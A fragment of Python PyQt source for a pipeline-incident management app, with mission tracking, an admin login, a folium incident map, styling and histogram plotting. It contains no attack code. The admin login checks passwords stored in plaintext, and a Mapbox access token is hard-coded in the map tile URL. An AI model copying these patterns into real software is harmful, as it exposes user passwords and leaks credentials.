mission_id)\r\n# Add the item to the list\r\n self.mainwi.listWidget.addItem(item)\r\n\r\n# Connect the item's state change to the update_mission_state function\r\n self.mainwi.listWidget.itemChanged.connect(self.update_mission_state)\r\n\r\n# Retrieve upcoming missions for the current user\r\n upcoming_msquery = QSqlQuery()\r\n upcoming_msquery.prepare(\"SELECT * FROM messions WHERE assigned_to = ? AND state = 'pending'\")\r\n upcoming_msquery.addBindValue(id_user)\r\n upcoming_msquery.exec_()\r\n\r\n while upcoming_msquery.next():\r\n mission_id = upcoming_msquery.value(0)\r\n description = upcoming_msquery.value(1)\r\n start_date = upcoming_msquery.value(2)\r\n start_date = datetime.strptime(start_date, \"%Y-%m-%d %H:%M:%S\")\r\n remaining_time = start_date - datetime.now()\r\n\r\n if remaining_time.days > 365:\r\n remaining_text = f\"{remaining_time.days // 365} years\"\r\n elif remaining_time.days > 30:\r\n remaining_text = f\"{remaining_time.days // 30} months\"\r\n elif remaining_time.days > 0:\r\n remaining_text = f\"{remaining_time.days} days\"\r\n elif remaining_time.seconds > 3600:\r\n remaining_text = f\"{remaining_time.seconds // 3600} hours\"\r\n else:\r\n remaining_text = f\"{remaining_time.seconds // 60} minutes\"\r\n \r\n item = QtWidgets.QListWidgetItem(f\"{description} (Starts in: {remaining_text})\")\r\n item.setData(Qt.UserRole, mission_id)\r\n item.setSizeHint(item.sizeHint()) # Adjust the size of the item\r\n \r\n self.mainwi.listWidget_2.addItem(item)\r\n\r\n\r\n db.commit()\r\n db.close()\r\n\r\n \r\n def update_mission_state(self, item):\r\n clicked_item = self.mainwi.listWidget.item(self.mainwi.listWidget.row(item))\r\n mession_id = clicked_item.data(Qt.UserRole)\r\n\r\n db = QSqlDatabase.addDatabase(\"QSQLITE\")\r\n db.setDatabaseName(resource_path(\"spdb.db\")) # Replace with the actual database file name\r\n\r\n try:\r\n if not db.open():\r\n print(\"Failed to connect to the database.\")\r\n return\r\n\r\n update_query = QSqlQuery()\r\n update_query.prepare(\"UPDATE messions SET state = CASE WHEN end_date <= :current_date THEN 'completed' ELSE 'done late' END, end_date = :current_date WHERE mession_id = :mession_id\")\r\n update_query.bindValue(\":current_date\", QDateTime.currentDateTime().toString(\"yyyy-MM-dd HH:mm:ss\"))\r\n update_query.bindValue(\":mession_id\", mession_id)\r\n\r\n if not update_query.exec_():\r\n print(\"Error while updating the database:\", 
update_query.lastError().text())\r\n else:\r\n # Commit the transaction and remove the checked item from the list widget\r\n db.commit()\r\n self.mainwi.listWidget.takeItem(self.mainwi.listWidget.row(item))\r\n\r\n except Exception as e:\r\n print(\"An error occurred:\", str(e))\r\n finally:\r\n db.close() # Close the database connection\r\n\r\n\r\n def show_admin(self):\r\n # Get the username and password from the input fields\r\n username = self.lineEdit.text()\r\n password = self.lineEdit_2.text()\r\n db = QSqlDatabase.addDatabase(\"QSQLITE\")\r\n db.setDatabaseName(resource_path(\"spdb.db\")) # Replace with the actual database file name\r\n if not db.open():\r\n print(\"Failed to connect to the database.\")\r\n sys.exit(1)\r\n\r\n # Query the database for the username and password\r\n query = QSqlQuery()\r\n query.prepare(\"SELECT * FROM admin WHERE username = :username AND password = :password\")\r\n query.bindValue(\":username\", username)\r\n query.bindValue(\":password\", password)\r\n if query.exec_() and query.next():\r\n print(\"Login successful\")\r\n self.admin=admin()\r\n self.hide()\r\n self.admin.show()\r\n db.close()\r\n else:\r\n print(\"Login failed\")\r\n self.label_4.setText(\"Incorrect username or password.\")\r\n \r\n \r\n \r\nclass mainwi(QtWidgets.QMainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n uic.loadUi(resource_path('mainwindow.ui'), self)\r\n self.stackedWidget.setCurrentIndex(4)\r\n self.pushButton_2.clicked.connect(self.show_tab_2)\r\n self.pushButton.clicked.connect(self.show_tab_1)\r\n self.pushButton_4.clicked.connect(self.show_tab_3)\r\n self.pushButton_5.clicked.connect(self.show_tab_4)\r\n self.pushButton_6.clicked.connect(self.show_tab_5)\r\n self.radioButton.clicked.connect(self.plot_histogram)\r\n self.radioButton_2.clicked.connect(self.plot_histogram)\r\n self.radioButton_3.clicked.connect(self.plot_histogram)\r\n self.radioButton_4.clicked.connect(self.plot_histogram)\r\n self.canvas = None \r\n self.scheduler = BackgroundScheduler()\r\n \r\n\r\n# Schedule the job to run every minute (adjust as needed)\r\n self.scheduler.add_job(self.update_mission_states, 'interval', minutes=1)\r\n\r\n# Start the scheduler\r\n\r\n\r\n self.scheduler.start()\r\n # Create a layout for the main widget\r\n self.layout = QVBoxLayout(self.stackedWidget.widget(3))\r\n\r\n # Create the map widget\r\n self.map_widget = QWebEngineView()\r\n \r\n # Load the map URL (OpenStreetMap example)\r\n self.map_widget.load(QUrl(\"https://www.openstreetmap.org/export/embed.html?bbox=-74.1,40.7,-73.9,40.8&layer=mapnik\"))\r\n # creating the map object\r\n us_center = [39.8283, -98.5795]\r\n self.m = folium.Map(location=us_center, zoom_start=4,no_wrap=True)\r\n satellite_layer = TileLayer(\r\n tiles='https://api.mapbox.com/v4/mapbox.satellite/{z}/{x}/{y}.jpg?access_token=pk.eyJ1Ijoic2FyYXJhcmFyYXJhcmFyIiwiYSI6ImNsaHBmOGdyZDFxa2Uzcm9kdXRmZDR2NGMifQ.GjNfyd5TbRpFKZK5NvJAOA',\r\n attr='Map data © Mapbox',\r\n name='Satellite',\r\n overlay=True,\r\n control=True,\r\n nowrap=True\r\n \r\n) \r\n \r\n # with open(\"us-states.json\", \"r\") as f:\r\n # geojson_data = f.read()\r\n \r\n \r\n # folium.GeoJson(geojson_data, name=\"US States\").add_to(self.m) \r\n \r\n # Create a minimap and add it to the main map\r\n minimap = MiniMap()\r\n self.m.add_child(minimap)\r\n # Add the map widget to the layout\r\n \r\n self.layout.addWidget(self.map_widget)\r\n \r\n # Create a custom HTML element for the title\r\n title_html = \"\"\"\r\n
<h3 align=\"center\" style=\"font-size: 20px;\"><b>\r\n             Geographical Localization of Incidents\r\n             </b></h3>
\r\n \"\"\"\r\n\r\n # Inject the custom HTML element into the output HTML file\r\n self.m.get_root().html.add_child(folium.Element(title_html))\r\n\r\n \r\n conn = sqlite3.connect(resource_path('spdb.db'))\r\n cursor = conn.cursor()\r\n cursor.execute(\"SELECT * FROM Incidents\")\r\n rows = cursor.fetchall()\r\n marker_cluster = MarkerCluster(name='Markers').add_to(self.m)\r\n marker_data = []\r\n # icon = folium.features.CustomIcon('marker.svg', icon_size=(100, 100))\r\n\r\n\r\n for row in rows:\r\n \r\n ReportNumber = row[0]\r\n AccidentDateTime = row[1]\r\n OperatorID = row[2]\r\n PipelineFacilityName = row[3]\r\n PipelineType = row[4]\r\n LiquidType = row[5]\r\n AccidentState = row[6]\r\n AccidentLatitude = row[7]\r\n AccidentLongitude = row[8]\r\n CauseCategory = row[9]\r\n CauseSubcategory = row[10]\r\n UnintentionalRelease = row[11]\r\n LiquidIgnition = row[12]\r\n LiquidExplosion = row[13]\r\n PipelineShutdown = row[14]\r\n popup = f\"Report Number: {ReportNumber}
<br>Accident Date/Time: {AccidentDateTime}<br>Operator ID: {OperatorID}<br>Pipeline/Facility Name: {PipelineFacilityName}<br>Pipeline Type: {PipelineType}<br>Liquid Type: {LiquidType}<br>Accident State: {AccidentState}<br>Accident Latitude: {AccidentLatitude}<br>Accident Longitude: {AccidentLongitude}<br>Cause Category: {CauseCategory}<br>Cause Subcategory: {CauseSubcategory}<br>Unintentional Release (Barrels): {UnintentionalRelease}<br>Liquid Ignition: {LiquidIgnition}<br>Liquid Explosion: {LiquidExplosion}<br>
Pipeline Shutdown: {PipelineShutdown}\"\r\n marker = folium.Marker(location=[AccidentLatitude, AccidentLongitude],tooltip=\"click to see more info\", popup=popup,icon=folium.Icon(icon='glyphicon-wrench', color='blue', icon_color='white', icon_size=(40, 40))\r\n)\r\n marker_data.append(marker)\r\n \r\n # Add all markers to the map\r\n for marker in marker_data:\r\n marker.add_to(self.m)\r\n marker_cluster.add_child(marker)\r\n\r\n\r\n # Save the map to an HTML file\r\n satellite_layer.add_to(self.m)\r\n\r\n# Create a custom button to toggle the satellite layer\r\n folium.LayerControl(position='topleft').add_to(self.m)\r\n\r\n self.m.save(resource_path(\"map.html\"))\r\n conn.close()\r\n html_path = os.path.abspath(resource_path(\"map.html\"))\r\n self.map_widget.load(QUrl.fromLocalFile(html_path))\r\n \r\n \r\n \r\n QtCore.QMetaObject.connectSlotsByName(self)\r\n self.hamburgerbtn=QtWidgets.QPushButton(self.centralwidget)\r\n self.hamburgerbtn.setStyleSheet( \"\\n\"\r\n\"background-color: rgb(19, 51, 76);\" \r\n \"margin-top:10px;\"\r\n \"margin-left:10\"\r\n )\r\n icon = QIcon(resource_path('hamburger_orng.svg'))\r\n \r\n self.hamburgerbtn.setIcon(icon)\r\n self.hamburgerbtn.setGeometry(5,5, 40, 40)\r\n self.hamburgerbtn.setObjectName(\"hamburgerbtn\")\r\n self.hamburgerbtn.clicked.connect(self.toggleMenu)\r\n self.frame.setVisible(True)\r\n #self.stackedWidget.setGeometry(50,0,self.centralwidget.width()-50, self.centralwidget.height())\r\n# Access the widgets of the stacked widgetself.page1 = self.stackedWidget.widget(0)\r\n self.page1 = self.stackedWidget.widget(0)\r\n self.page2 = self.stackedWidget.widget(1)\r\n self.page3 = self.stackedWidget.widget(2)\r\n self.page4 = self.stackedWidget.widget(3)\r\n\r\n# Create the buttons for each widget\r\n self.button1 = QPushButton(\"\", self.page1)\r\n self.button2 = QPushButton(\"\", self.page2)\r\n self.button3 = QPushButton(\"\", self.page3)\r\n self.button4 = QPushButton(\"\", self.page4)\r\n\r\n# Set the button positions using absolute positioning\r\n self.button1.setGeometry(self.page1.width() - self.button1.width() -10, 2, self.button1.width(), self.button1.height())\r\n self.button2.setGeometry(self.page2.width() - self.button2.width() -10, 2, self.button2.width(), self.button2.height())\r\n self.button3.setGeometry(self.page3.width() - self.button3.width() -10, 2, self.button3.width(), self.button3.height())\r\n self.button4.setGeometry(self.page4.width() - self.button4.width() -10, 2, self.button4.width(), self.button4.height())\r\n self.button1.setFixedSize(30, 30) \r\n self.button1.setStyleSheet('''QPushButton { \r\n background-color:rgb(253, 95, 0);\r\n font: 900 11pt Arial Black;\r\n color:rgb(0, 87, 146);\r\n border: 1px solid rgb(237, 131, 0);\r\n border-radius:15%;\r\n text-align: left;\r\n padding-left:3px;\r\n }\r\n QPushButton:hover {\r\n background-color:qlineargradient(spread:repeat, x1:0, y1:1, x2:1, y2:0, stop:0.28436 rgba(253, 95, 0, 255), stop:0.890995 rgba(255, 193, 35, 255));\r\n border: 1px solid gray;\r\n box-shadow: 5px 10px rgb(255, 175, 15);\r\n }\r\n\r\n''')\r\n self.button2.setFixedSize(30, 30) \r\n self.button2.setStyleSheet('''QPushButton { \r\n background-color:rgb(253, 95, 0);\r\n font: 900 11pt Arial Black;\r\n color:rgb(0, 87, 146);\r\n border: 1px solid rgb(237, 131, 0);\r\n border-radius:15%;\r\n text-align: left;\r\n padding-left:3px;\r\n }\r\n QPushButton:hover {\r\n background-color:qlineargradient(spread:repeat, x1:0, y1:1, x2:1, y2:0, stop:0.28436 rgba(253, 95, 0, 255), stop:0.890995 rgba(255, 
193, 35, 255));\r\n border: 1px solid gray;\r\n box-shadow: 5px 10px rgb(255, 175, 15);\r\n }\r\n\r\n''')\r\n self.button3.setFixedSize(30, 30) \r\n self.button3.setStyleSheet('''QPushButton { \r\n background-color:rgb(253, 95, 0);\r\n font: 900 11pt Arial Black;\r\n color:rgb(0, 87, 146);\r\n border: 1px solid rgb(237, 131, 0);\r\n border-radius:15%;\r\n text-align: left;\r\n padding-left:3px;\r\n }\r\n QPushButton:hover {\r\n background-color:qlineargradient(spread:repeat, x1:0, y1:1, x2:1, y2:0, stop:0.28436 rgba(253, 95, 0, 255), stop:0.890995 rgba(255, 193, 35, 255));\r\n border: 1px solid gray;\r\n box-shadow: 5px 10px rgb(255, 175, 15);\r\n \r\n }\r\n\r\n''')\r\n self.button4.setFixedSize(30, 30) \r\n self.button4.setStyleSheet('''QPushButton { \r\n background-color:rgb(253, 95, 0);\r\n font: 900 11pt Arial Black;\r\n color:rgb(0, 87, 146);\r\n border: 1px solid rgb(237, 131, 0);\r\n border-radius:15%;\r\n text-align: left;\r\n padding-left:3px;\r\n }\r\n QPushButton:hover {\r\n background-color:qlineargradient(spread:repeat, x1:0, y1:1, x2:1, y2:0, stop:0.28436 rgba(253, 95, 0, 255), stop:0.890995 rgba(255, 193, 35, 255));\r\n border: 1px solid gray;\r\n box-shadow: 5px 10px rgb(255, 175, 15);\r\n }\r\n\r\n''') \r\n self.button1.setIcon(QIcon(resource_path(\"icons8-home-page-26.png\")))\r\n self.button2.setIcon(QIcon(resource_path(\"icons8-home-page-26.png\")))\r\n self.button3.setIcon(QIcon(resource_path(\"icons8-home-page-26.png\")))\r\n self.button4.setIcon(QIcon(resource_path(\"icons8-home-page-26.png\")))\r\n\r\n self.button1.clicked.connect(self.home)\r\n self.button2.clicked.connect(self.home)\r\n self.button3.clicked.connect(self.home)\r\n self.button4.clicked.connect(self.home)\r\n\r\n validator = QDoubleValidator()\r\n self.lineEdit.setValidator(validator)\r\n self.lineEdit_2.setValidator(validator)\r\n self.lineEdit_3.setValidator(validator)\r\n self.lineEdit_4.setValidator(validator)\r\n self.lineEdit_6.setValidator(validator)\r\n self.lineEdit_7.setValidator(validator)\r\n \r\n self.save.clicked.connect(self.add_value)\r\n self.cancel.clicked.connect(self.clear_fields)\r\n self.pred.clicked.connect(self.predict_shutdown)\r\n self.lineEdit_5.textChanged.connect(self.search_table) \r\n\r\n self.dateTimeEdit.setDateTime(QDateTime.currentDateTime())\r\n self.dateTimeEdit_2.setDateTime(QDateTime.currentDateTime())\r\n self.toolButton.clicked.connect(self.show_menu)\r\n \r\n\r\n #styling the tabel\r\n self.tableWidget.setStyleSheet('''\r\n QTableWidget {\r\n background-color: rgb(19, 51, 76);\r\n border: 1px solid rgb(19, 51, 76);\r\n color: rgb(246, 246, 233);\r\n }\r\n \r\n QTableWidget::item {\r\n padding: 5px;\r\n border: 1px solid rgb(253, 95, 0) ;\r\n }\r\n \r\n QHeaderView::section {\r\n background-color: rgb(253, 95, 0);\r\n font-weight: bold;\r\n border: 1px solid rgb(253, 95, 0);\r\n color:rgb(0, 87, 146);\r\n }\r\n''')\r\n #styling the scroll bar\r\n self.tableWidget.verticalScrollBar().setStyleSheet('''\r\n QScrollBar:vertical {\r\n background: transparent;\r\n width: 15px;\r\n border-radius: 7px;\r\n margin: 20px 0 20px 0;\r\n }\r\n\r\n QScrollBar::handle:vertical {\r\n background: rgb(19, 51, 76);\r\n border-radius: 7px;\r\n min-height: 20px;\r\n }\r\n\r\n QScrollBar::add-line:vertical {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::sub-line:vertical {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::add-page:vertical, QScrollBar::sub-page:vertical {\r\n background: #e1e1e1; /* Set your desired background color */\r\n 
height: 15px;\r\n margin: 5px 0 5px 0;\r\n border-radius: 7px;\r\n }\r\n\r\n QScrollBar::handle:horizontal {\r\n background:rgb(19, 51, 76); /* Set your desired handle color */\r\n min-width: 20px;\r\n border-radius: 7px;\r\n \r\n }\r\n\r\n QScrollBar::add-line:horizontal,\r\n QScrollBar::sub-line:horizontal {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::add-page:horizontal,\r\n QScrollBar::sub-page:horizontal {\r\n background: none;\r\n }\r\n''')\r\n\r\n self.tableWidget_2.setStyleSheet('''\r\n QTableWidget {\r\n background-color: rgb(19, 51, 76);\r\n border: 1px solid rgb(19, 51, 76);\r\n color: rgb(246, 246, 233);\r\n }\r\n \r\n QTableWidget::item {\r\n padding: 5px;\r\n border: 1px solid rgb(253, 95, 0) ;\r\n }\r\n \r\n QHeaderView::section {\r\n background-color: rgb(253, 95, 0);\r\n font-weight: bold;\r\n border: 1px solid rgb(253, 95, 0);\r\n color:rgb(0, 87, 146);\r\n }\r\n''')\r\n #styling the scroll bar\r\n self.tableWidget_2.verticalScrollBar().setStyleSheet('''\r\n QScrollBar:vertical {\r\n background: transparent;\r\n width: 15px;\r\n border-radius: 7px;\r\n margin: 20px 0 20px 0;\r\n }\r\n\r\n QScrollBar::handle:vertical {\r\n background: rgb(19, 51, 76);\r\n border-radius: 7px;\r\n min-height: 20px;\r\n }\r\n\r\n QScrollBar::add-line:vertical {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::sub-line:vertical {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::add-page:vertical, QScrollBar::sub-page:vertical {\r\n background: none;\r\n }\r\n''')\r\n self.tableWidget_2.horizontalScrollBar().setStyleSheet('''\r\n QScrollBar:horizontal {\r\n background: #e1e1e1; /* Set your desired background color */\r\n height: 15px;\r\n margin: 5px 0 5px 0;\r\n border-radius: 7px;\r\n }\r\n\r\n QScrollBar::handle:horizontal {\r\n background:rgb(19, 51, 76); /* Set your desired handle color */\r\n min-width: 20px;\r\n border-radius: 7px;\r\n \r\n }\r\n\r\n QScrollBar::add-line:horizontal,\r\n QScrollBar::sub-line:horizontal {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::add-page:horizontal,\r\n QScrollBar::sub-page:horizontal {\r\n background: none;\r\n }\r\n''')\r\n self.tableWidget_3.setStyleSheet('''\r\n QTableWidget {\r\n background-color: rgb(19, 51, 76);\r\n border: 1px solid rgb(19, 51, 76);\r\n color: rgb(246, 246, 233);\r\n }\r\n \r\n QTableWidget::item {\r\n padding: 5px;\r\n border: 1px solid rgb(253, 95, 0) ;\r\n }\r\n \r\n QHeaderView::section {\r\n background-color: rgb(253, 95, 0);\r\n font-weight: bold;\r\n border: 1px solid rgb(253, 95, 0);\r\n color:rgb(0, 87, 146);\r\n }\r\n''')\r\n #styling the scroll bar\r\n self.tableWidget_3.verticalScrollBar().setStyleSheet('''\r\n QScrollBar:vertical {\r\n background: transparent;\r\n width: 15px;\r\n border-radius: 7px;\r\n margin: 20px 0 20px 0;\r\n }\r\n\r\n QScrollBar::handle:vertical {\r\n background: rgb(19, 51, 76);\r\n border-radius: 7px;\r\n min-height: 20px;\r\n }\r\n\r\n QScrollBar::add-line:vertical {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::sub-line:vertical {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::add-page:vertical, QScrollBar::sub-page:vertical {\r\n background: none;\r\n }\r\n''')\r\n self.tableWidget_3.horizontalScrollBar().setStyleSheet('''\r\n QScrollBar:horizontal {\r\n background: #e1e1e1; /* Set your desired background color */\r\n height: 15px;\r\n margin: 5px 0 5px 0;\r\n border-radius: 7px;\r\n }\r\n\r\n QScrollBar::handle:horizontal {\r\n background:rgb(19, 51, 76); /* Set your 
desired handle color */\r\n min-width: 20px;\r\n border-radius: 7px;\r\n \r\n }\r\n\r\n QScrollBar::add-line:horizontal,\r\n QScrollBar::sub-line:horizontal {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::add-page:horizontal,\r\n QScrollBar::sub-page:horizontal {\r\n background: none;\r\n }\r\n''')\r\n\r\n \r\n \r\n \r\n#######################################################################################\r\n#######################################################################################\r\n#################THE FUNCTIONSSSSSSSSSSS#############\r\n#######################################################################################\r\n####################################################################################### \r\n def show_menu(self):\r\n menu = QMenu(self)\r\n # Apply style sheet to the menu\r\n menu.setStyleSheet(\"\"\"\r\n QMenu {\r\n background-color: #13334C;\r\n border: 1px solid #005792;\r\n color: #005792;\r\n font: 700 8pt Arial Black;\r\n width:100px;\r\n }\r\n QMenu::item {\r\n padding: 5px 30px 5px 20px;\r\n border: 1px solid #005792;\r\n }\r\n QMenu::item:selected {\r\n background-color: #F6F6E9;\r\n color: #FD5F00;\r\n border: 1px solid rgb(253, 95, 0);\r\n }\r\n \"\"\")\r\n\r\n # Create actions with icons\r\n action1 = QAction(QIcon(resource_path(\"icons\\\\icons8-more-info-26.png\")), \"more info\", self)\r\n action2 = QAction(QIcon(resource_path(\"icons\\\\icons8-logout-48.png\")), \"Log Out\", self)\r\n \r\n # Set custom style for the actions\r\n action1.setIconVisibleInMenu(True)\r\n action1.setIconText(\"more info\")\r\n action1.setIcon(QIcon(resource_path(\"icons\\\\icons8-more-info-26.png\")))\r\n \r\n action2.setIconVisibleInMenu(True)\r\n action2.setIconText(\"Log Out\")\r\n action2.setIcon(QIcon(resource_path(\"icons\\\\icons8-logout-48.png\")))\r\n \r\n action1.triggered.connect(self.option1_selected)\r\n action2.triggered.connect(self.option2_selected)\r\n menu.addAction(action1)\r\n menu.addAction(action2)\r\n menu.exec_(self.toolButton.mapToGlobal(self.toolButton.rect().bottomLeft()))\r\n \r\n def option1_selected(self):\r\n print(\"Option 1 selected!\")\r\n\r\n def option2_selected(self):\r\n self.window1=Window1()\r\n self.hide()\r\n self.window1.show()\r\n def plot_histogram(self):\r\n conn = sqlite3.connect(resource_path('spdb.db'))\r\n query = \"SELECT * FROM Incidents WHERE `Pipeline Shutdown` = 'YES'\"\r\n df = pd.read_sql_query(query, conn)\r\n conn.close()\r\n df.info()\r\n\r\n # Get the selected radio button\r\n selected_button = self.sender()\r\n\r\n # Get the selected column name\r\n column_name = selected_button.text()\r\n print(column_name)\r\n\r\n # Plot the histogram based on the selected column\r\n plt.clf()\r\n fig = Figure(figsize=(6, 2))\r\n ax = fig.add_subplot(111)\r\n # Set padding values (adjust as needed)\r\n left = 0.2 # Left padding\r\n right = 0.9 # Right padding\r\n bottom = 0.2 # Bottom padding\r\n top = 0.9 # Top padding\r\n # Adjust subplot parameters\r\n fig.subplots_adjust(left=left, right=right, bottom=bottom, top=top)\r\n # Customize the color theme\r\n num_unique_values = len(df[column_name].unique())\r\n bar_colors = [random.choice(['#'+format(random.randint(0, 0xFFFFFF), '06x') for _ in range(6)]) for _ in range(num_unique_values)]\r\n background_color = 'lightgray' # Background color of the plot\r\n grid_color = 'white' # Color of the grid lines\r\n label_color = 'black' # Color of the axis labels \r\n # Set the colors\r\n ax.set_facecolor(background_color)\r\n 
ax.grid(color=grid_color)\r\n ax.spines['bottom'].set_color(label_color)\r\n ax.spines['left'].set_color(label_color)\r\n ax.tick_params(axis='x', colors=label_color)\r\n ax.tick_params(axis='y', colors=label_color)\r\n df[column_name].value_counts().plot(kind='bar', ax=ax, legend=False, color=bar_colors)\r\n ax.set_xlabel(column_name, fontsize=7)\r\n ax.set_xticklabels(ax.get_xticklabels(), rotation=10, ha='right')\r\n ax.tick_params(axis='x', labelsize=7) \r\n ax.set_ylabel('Pipeline Shutdown Count')\r\n ax.set_title('Histogram of Pipeline Shutdown based on {}'.format(column_name))\r\n # Enable zoom for the entire plot\r\n ax.autoscale(enable=True, tight=True)\r\n # Create or update the canvas\r\n if self.canvas is None:\r\n self.canvas = FigureCanvas(fig)\r\n layout = QtWidgets.QVBoxLayout(self.frame_2)\r\n self.toolbar = NavigationToolbar(self.canvas, self.frame_2) # Add the toolbar\r\n layout.addWidget(self.toolbar)\r\n layout.addWidget(self.canvas)\r\n self.frame_2.setLayout(layout)\r\n else:\r\n layout = self.frame_2.layout()\r\n layout.removeWidget(self.canvas)\r\n layout.removeWidget(self.toolbar) # Remove previous toolbar\r\n self.canvas.close()\r\n self.canvas = FigureCanvas(fig)\r\n self.toolbar = NavigationToolbar(self.canvas, self.frame_2) # Add the new toolbar\r\n layout.addWidget(self.toolbar)\r\n layout.addWidget(self.canvas)\r\n self.frame_2.setMinimumSize(self.canvas.sizeHint())\r\n self.canvas.draw() \r\n \r\n def update_mission_states(self):\r\n database_lock = threading.Lock()\r\n database_lock.acquire()\r\n\r\n try:\r\n conn = sqlite3.connect(resource_path('spdb.db')) # Replace with the path to your SQLite database file\r\n cursor = conn.cursor()\r\n\r\n # Get missions with states not 'completed' or 'done late'\r\n cursor.execute(\"SELECT * FROM messions WHERE state NOT IN ('completed', 'done late')\")\r\n missions = cursor.fetchall()\r\n\r\n # Update the state of each mission based on the current time\r\n current_time = datetime.now()\r\n for mission in missions:\r\n mission_id = mission[0]\r\n start_time = datetime.strptime(mission[2], \"%Y-%m-%d %H:%M:%S\")\r\n end_time = datetime.strptime(mission[3], \"%Y-%m-%d %H:%M:%S\")\r\n state = mission[5]\r\n if current_time < start_time:\r\n state= 'pending'\r\n elif start_time <= current_time < end_time:\r\n state = 'ongoing'\r\n\r\n # Update the mission's state in the database\r\n cursor.execute(\"UPDATE messions SET state = ? 
WHERE mession_id = ?\", (state, mission_id))\r\n\r\n conn.commit()\r\n conn.close()\r\n except Exception as e:\r\n # Handle any exceptions that may occur during the database operation\r\n print(\"Error while updating the database:\", str(e))\r\n finally:\r\n # Release the lock after the database operation is completed\r\n database_lock.release()\r\n def toggleMenu(self):\r\n # Toggle menu visibility\r\n \r\n self.frame.setVisible(not self.frame.isVisible())\r\n self.button1.setGeometry(self.page1.width() - self.button1.width()-20, 2, self.button1.width(), self.button1.height())\r\n self.button2.setGeometry(self.page2.width() - self.button2.width()-20, 2, self.button2.width(), self.button2.height())\r\n self.button3.setGeometry(self.page3.width() - self.button3.width()-20, 2, self.button3.width(), self.button3.height())\r\n self.button4.setGeometry(self.page4.width() - self.button4.width() -20 , 2, self.button4.width(), self.button4.height())\r\n\r\n if self.frame.isVisible():\r\n \r\n self.hamburgerbtn.setStyleSheet( \"\\n\" \"background-color: rgb(253, 95, 0);\"\r\n \"margin-top:10px;\"\r\n \"margin-left:10\"\r\n )\r\n icon2=QIcon(resource_path('hamburger.svg'))\r\n self.hamburgerbtn.setIcon(icon2)\r\n self.stackedWidget.setGeometry(250, 0, self.centralwidget.width()-250, self.centralwidget.height())\r\n self.tableWidget.setGeometry(30,70,500,500)\r\n \r\n \r\n # self.label_19.setGeometry(self.stackedWidget.width() - 110, 10, 40, 40)\r\n # self.toolButton.setGeometry(self.stackedWidget.width() - 110, 10, 100, 40)\r\n # Set the button positions using absolute positioning\r\n self.button1.setGeometry(self.page1.width() - self.button1.width()-20, 2, self.button1.width(), self.button1.height())\r\n self.button2.setGeometry(self.page2.width() - self.button2.width()-20, 2, self.button2.width(), self.button2.height())\r\n self.button3.setGeometry(self.page3.width() - self.button3.width()-20, 2, self.button3.width(), self.button3.height())\r\n self.button4.setGeometry(self.page4.width() - self.button4.width() -20 , 2, self.button4.width(), self.button4.height())\r\n\r\n else :\r\n \r\n self.hamburgerbtn.setStyleSheet( \"\\n\" \" background-color: rgb(19, 51, 76);\" \r\n \"margin-top:10px;\"\r\n \"margin-left:10\")\r\n icon = QIcon('hamburger_orng.svg')\r\n self.hamburgerbtn.setIcon(icon)\r\n self.stackedWidget.setGeometry(50,0,self.centralwidget.width()+200, self.centralwidget.height())\r\n self.tableWidget.setGeometry(30,70,700,500)\r\n self.button1.setGeometry(self.page1.width() - self.button1.width() +50, 2, self.button1.width(), self.button1.height())\r\n self.button2.setGeometry(self.page2.width() - self.button2.width() +50, 2, self.button2.width(), self.button2.height())\r\n self.button3.setGeometry(self.page3.width()- self.button3.width()+50, 2, self.button3.width(), self.button3.height())\r\n self.button4.setGeometry(self.page4.width() - self.button4.width() +50, 2, self.button4.width(), self.button4.height())\r\n \r\n \r\n # self.label_19.setGeometry(self.stackedWidget.width() +110, 10, 40, 40)\r\n # self.toolButton.setGeometry(self.stackedWidget.width() + 110, 10, 100, 40)\r\n def home(self):\r\n self.stackedWidget.setCurrentIndex(4)\r\n def show_tab_1(self):\r\n self.stackedWidget.setCurrentIndex(0)\r\n \r\n def show_tab_2(self):\r\n self.stackedWidget.setCurrentIndex(2) \r\n \r\n def show_tab_3(self):\r\n self.stackedWidget.setCurrentIndex(1) \r\n # Connect to the database\r\n conn = sqlite3.connect(resource_path(\"spdb.db\")) # Replace with the actual database file name\r\n cursor = 
conn.cursor()\r\n \r\n # Retrieve data from the database table\r\n cursor.execute(\"SELECT * FROM Incidents\")\r\n data = cursor.fetchall()\r\n\r\n # Set the number of rows and columns in the table\r\n self.tableWidget.setRowCount(len(data))\r\n self.tableWidget.setColumnCount(len(data[0])) # Assuming all rows have the same number of columns\r\n\r\n # Add data to the table\r\n for i, row in enumerate(data):\r\n for j, value in enumerate(row):\r\n item = QTableWidgetItem(str(value))\r\n self.tableWidget.setItem(i, j, item)\r\n\r\n # Set table properties\r\n header_labels = [description[0] for description in cursor.description]\r\n self.tableWidget.setHorizontalHeaderLabels(header_labels)\r\n self.tableWidget.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOn)\r\n self.tableWidget.setSizeAdjustPolicy(QTableWidget.AdjustToContents)\r\n self.tableWidget.setEditTriggers(QTableWidget.NoEditTriggers)\r\n self.tableWidget.setHorizontalScrollBarPolicy(Qt.ScrollBarAsNeeded)\r\n self.tableWidget.verticalHeader().setVisible(False)\r\n self.tableWidget.resizeRowsToContents()\r\n self.tableWidget.resizeColumnsToContents()\r\n\r\n # Close the database connection\r\n conn.close()\r\n \r\n \r\n def show_tab_4(self):\r\n self.stackedWidget.setCurrentIndex(3)\r\n def show_tab_5(self):\r\n self.stackedWidget.setCurrentIndex(5) \r\n # Connect to the database\r\n conn = sqlite3.connect(resource_path(\"spdb.db\")) # Replace with the actual database file name\r\n cursor = conn.cursor()\r\n \r\n # Retrieve data from the database table\r\n cursor.execute(\"SELECT * FROM Pipelines\")\r\n data = cursor.fetchall()\r\n\r\n # Set the number of rows and columns in the table\r\n self.tableWidget_2.setRowCount(len(data))\r\n self.tableWidget_2.setColumnCount(len(data[0])) # Assuming all rows have the same number of columns\r\n\r\n # Add data to the table\r\n for i, row in enumerate(data):\r\n for j, value in enumerate(row):\r\n item = QTableWidgetItem(str(value))\r\n self.tableWidget_2.setItem(i, j, 